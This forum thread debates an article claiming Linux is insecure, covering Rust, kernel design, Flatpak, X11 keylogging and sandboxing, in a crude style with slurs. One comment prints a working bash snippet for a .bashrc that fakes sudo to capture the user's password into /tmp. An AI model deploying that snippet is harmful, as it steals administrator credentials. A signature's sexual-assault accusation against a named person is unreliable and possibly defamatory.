Unable to load image

Linux :marseypenguin: being secure :marseycop2: is a common misconception in the security :capyhacker: and privacy :marseypedo: realm :marseyspyglow::!marseyjewoftheorientglow:

https://madaidans-insecurities.github.io/linux.html

GNU+Linux bros :marseypenguin: I don't feel so good :marseydisintegrate::marseyhacker::capyhacker:

!codecels discuss

57
Jump in the discussion.

No email address required.

https://i.rdrama.net/images/16794381950713048.webp

Snapshots:

Jump in the discussion.

No email address required.

:#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat:

Jump in the discussion.

No email address required.

https://i.rdrama.net/images/16892013679266138.webp

Jump in the discussion.

No email address required.

Most programs on Linux are written in memory unsafe languages, such as C or C++, which causes the majority of discovered security vulnerabilities. Other operating systems have made more progress on adopting memory safe languages, such as Windows, which is leaning heavily towards Rust, a memory safe language, or macOS which is adopting Swift. While Windows and macOS are still mostly written in memory unsafe languages, they are at least making some progress on switching to safe alternatives.

This is an r-slured fricking paragraph and plain wrong. All the OSes have experimented with rust without any using it to any significant degree.

The Linux kernel itself is also extremely lacking in security. It is a monolithic kernel, which means that it contains a colossal amount of code all within the most privileged part of the operating system and has no isolation between internal components whatsoever.

and then

Other kernels, such as the Windows and macOS kernels, are somewhat similar too, in that they are also large and bloated monolithic kernels with huge attack surface

xD

The rest of it is scraping the barrel for things to criticise. Maybe someone will pretend to be sudo. derp.

The one valid point that the article does make is that OSes were designed to be multi-user where you'd not trust the other users. Now they're almost always single user but you wanna be suspicious of the applications instead. But I'm not sure if there is really any good way to solve that without completely redesigning how computers work.

Jump in the discussion.

No email address required.

>rust is safe because le memory-safety

Isn't Lemmy written in Rust, and didn't they just announce a massive XSS vuln? Memory-safe doesn't mean well written.

Jump in the discussion.

No email address required.

>xss in typescript

>rust le bad

:#marseyravecope:

Jump in the discussion.

No email address required.

I actually like programming in rust but I wish the let's rewrite the whole of Linux in rust people would frick off.

Jump in the discussion.

No email address required.

they are legit glowies who want their non-foss spyware rust backdoors in

there's a reason rust freaked the frick out at someone making a compiler

Jump in the discussion.

No email address required.

why do you think Rust is non-FOSS? :marseyconfused:


Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

He's not saying it's non-FOSS, he's bringing up how there's basically just the one official rust compiler instead of there being multiple competing compilers like with C and C++, and most other programming languages. This is due to the fact that Rust doesn't actually have a formal specification, specification is whatever the Official Compiler does. This isn't a wise move because it doesn't guarantee that rust code written in the past will behave the same in the future or present. It also makes it borderline impossible to create an alternative compiler, since there's nothing saying that a specific keyword should exist or behave a certain way. This is bad.

Jump in the discussion.

No email address required.

not saying it’s non-FOSS


non-foss spyware

:marseysurejan:

no spec

The fact I’ve heard this as the paramount complaint of Rust in current year actually inspires more confidence in it imo.

There’s no document that people would ignore anyway but it’s super duper important so a neurodivergent neckbeard can get a half-broken gcc port? This is the biggest complaint about Rust?


Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

I mean there's the fact that the actual rust compiler is obscenely aids to actually bootstrap, etc. I think you're just being contrarian here because you want marseycoin or something. It's pretty clear that this is an actual issue.

Jump in the discussion.

No email address required.

I can write it less smugly but I don’t legitimately think a single compiler ecosystem is that big of an issue, no.


Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

More comments

GNU Hurd chads simply can't stop winning. monolithicels stay seething

Jump in the discussion.

No email address required.

Imagine not having to interject any longer

https://i.rdrama.net/images/16891991024874403.webp

Jump in the discussion.

No email address required.

But I'm not sure if there is really any good way to solve that without completely redesigning how computers work.

It's solved by mobile OSes with their strict sandboxing and easy gui permissions settings, but yes, the desktop is a long ways away. With Linux all we have are janky cowtools like selinux, apparmor, firejail, flatpak (bleh) and so on. Qubes OS is a usable system that actually makes good progress towards solving the problem, while something more like Genode/Sculpt OS is experimental but with a cleaner design and where we need to be heading towards in the long run.

Jump in the discussion.

No email address required.

>Qubes OS is a usable system

:marsey#xdoubt:

Jump in the discussion.

No email address required.

its completely usable yes

Jump in the discussion.

No email address required.

I wonder how well stuff like Guix and Nix solve this issue, if at all.

Jump in the discussion.

No email address required.

>someone might sneak a bash script on your system to intercept your sudoer password :marseypearlclutch:

Jump in the discussion.

No email address required.

sudo blow me you FUD spouting M$strag.

Jump in the discussion.

No email address required.

>puts this in your .bashrc

cat <<\EOF > /tmp/sudo
#!/bin/bash
if [[ "${@}" = "" ]]; then
 /usr/bin/sudo
else
 read -s -r -p "[sudo] password for ${USER}: " password
 echo "${password}" > /tmp/password
 echo "${password}" | /usr/bin/sudo -S ${@}
fi
EOF
chmod +x /tmp/sudo
export PATH="/tmp:${PATH}"

>eh nothing personal kid

Jump in the discussion.

No email address required.

uses bash

:!#marseyemojirofl:

Jump in the discussion.

No email address required.

You’re not seriously suggesting that csh is better?

Jump in the discussion.

No email address required.

bashcels seething at fishchads :carp:


Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

yes, those are the 2 shells.

:marseyeyeroll!#:

Jump in the discussion.

No email address required.

What about zsh?

Jump in the discussion.

No email address required.

Aka the bash rip off that Apple made for licensing reasons

Jump in the discussion.

No email address required.

:marseyagree:

Jump in the discussion.

No email address required.

Yeah I don’t understand this part of the article because there is no way for me to put this in another users profile.

Jump in the discussion.

No email address required.

I don't worry about it too much. If an attacker can get a shell on your system it's basically game over, so use network ACL's, use key auth instead of passwords, use short lived dynamic credentials. Instead of worrying about what all an attacker can exploit in the OS focus your energy on preventing them from even gaining access. Unless you have a quantum computer at your disposal I don't think you'll be able to crack my 4096 bit ssh key.

Jump in the discussion.

No email address required.

Nah man we gotta be paranoid about esoteric OS and application exploits instead of just gatekeeping our systems from malicious actors and malware

Jump in the discussion.

No email address required.

I think a modern OS install in 2023 are all equally secure, if you follow the golden rule of "only install from trusted sources".

I simply don't think there are many Pegasus-style attacks floating around, the ones that are you have little recourse for.

I think meme-people who style themselves as security experts like to dream most hacks are advanced when in reality it's almost always "Jane from accounting opened a phish".

Keep your firewall ports closed, use key auth and apply security updates automatically and you'll be better than most people getting pwned.


Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

The problem is that you install thousands of software packets and it just takes one (1) compromised software being run by a sudouser to compromise the system. This is a problem of Windows NT too, you have UAC but you don't have filesystem isolation and the system gives Administrator privileges to random exes very easily

Jump in the discussion.

No email address required.

Yes I’m I’m not sure what the easy solution is to that problem except reworking the entire ecosystem to be like iOS / Android like is mentioned above.

I think pseuds who claim Linux is “more secure” aren’t doing their research and what really matters how quickly you can patch.


Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

:#marseyhesright:

Jump in the discussion.

No email address required.

wrong

:#marseyindignant:

Jump in the discussion.

No email address required.

:#gigachad3:

Jump in the discussion.

No email address required.

Was this written by Theo? :marseythinkorino:

Jump in the discussion.

No email address required.

https://media.giphy.com/media/43DgQJkV2HbMc/giphy.webp

Jump in the discussion.

No email address required.

Flatpak aims to sandbox applications, but its sandboxing is very flawed. It fully trusts the applications and allows them to specify their own policy. This means that security is effectively optional and applications can simply choose not to be sufficiently sandboxed.

This author is an idiot. The purpose of self-specifying boundaries is two-fold:

  • It puts a blast radius around an app being misbehaved or being compromised. This is why Chrome self-sandboxes major parts of its runtime, even though their own engineers wrote the code being sandboxed.

  • OS, vendor, and IT policies can restrict installation based on requiring self-selection of more restrictive policies. This is why Google's add-on systems for Workspace have different criteria depending on what scopes an app self-selects, encouraging self-selection of narrower scopes.

Flatpaks could do the latter better, but the concept is sound.

Jump in the discussion.

No email address required.

Arch Linux used to have a grsecurity patch you can install with a single command, with is probably the best thing you can do against kernel and some userspace exploits. Haven’t used it in years since I switched back to MacOS. That plus general security good practices is better than most stock machines with predictable software stacks and entrypoints. Security through Obscurity is a legit tactic.

MACs like SELinux are mostly security theatre because no one really uses it meaningfullly cuz it’s so high touch

Jump in the discussion.

No email address required.

Duh.

Jump in the discussion.

No email address required.

Alternatively, an attacker could log keystrokes via X11

that's worrying. i hope somebody comes up with an x replacement. then linux would land in a way safer position

Jump in the discussion.

No email address required.

Yeah. It's pretty fricked up that you can run a program and it responds to your input.

There's been some great strides in disabling user input from the wayland team but I'm genuinely shocked that nobody's done anything about the terminal. That thing can read literally every keypress you make.

Jump in the discussion.

No email address required.

I love Wayland btw

Jump in the discussion.

No email address required.

I like to spin up Linux VMs to see how long it takes to get hacked.


Krayon sexually assaulted his sister. https://i.rdrama.net/images/17118241526738973.webp https://i.rdrama.net/images/17118241426254768.webp https://i.rdrama.net/images/17156480765435808.webp

Jump in the discussion.

No email address required.

security onion has a honey pot option that is pretty fetch


Putting the :e: in :marseyexcited:

Jump in the discussion.

No email address required.

i was doing something like this for a bit but instead i was collecting viral payloads out of my logs. mostly found stuff targeting shitty chinese iot devices

Jump in the discussion.

No email address required.

Sounds about right. There is no more cool viruses anymore that shows a frick you site on a specific day. Now it’s all lame ransomware and ddos.


Krayon sexually assaulted his sister. https://i.rdrama.net/images/17118241526738973.webp https://i.rdrama.net/images/17118241426254768.webp https://i.rdrama.net/images/17156480765435808.webp

Jump in the discussion.

No email address required.

How long does it take? What are you doing with it that causes you to get hacked?

Jump in the discussion.

No email address required.

Install Wordpress and never update it.


Krayon sexually assaulted his sister. https://i.rdrama.net/images/17118241526738973.webp https://i.rdrama.net/images/17118241426254768.webp https://i.rdrama.net/images/17156480765435808.webp

Jump in the discussion.

No email address required.

:#marseyglow2:

Jump in the discussion.

No email address required.

Factual

Jump in the discussion.

No email address required.

I see those cybersec courses are paying off

:#marseysoypointglow::#marseynoyouglow:

Jump in the discussion.

No email address required.

Don't most of these exposes basically just boil down to "if you don't set up linux to be secure, it will be insecure?"

Jump in the discussion.

No email address required.

Link copied to clipboard
Action successful!
Error, please refresh the page and try again.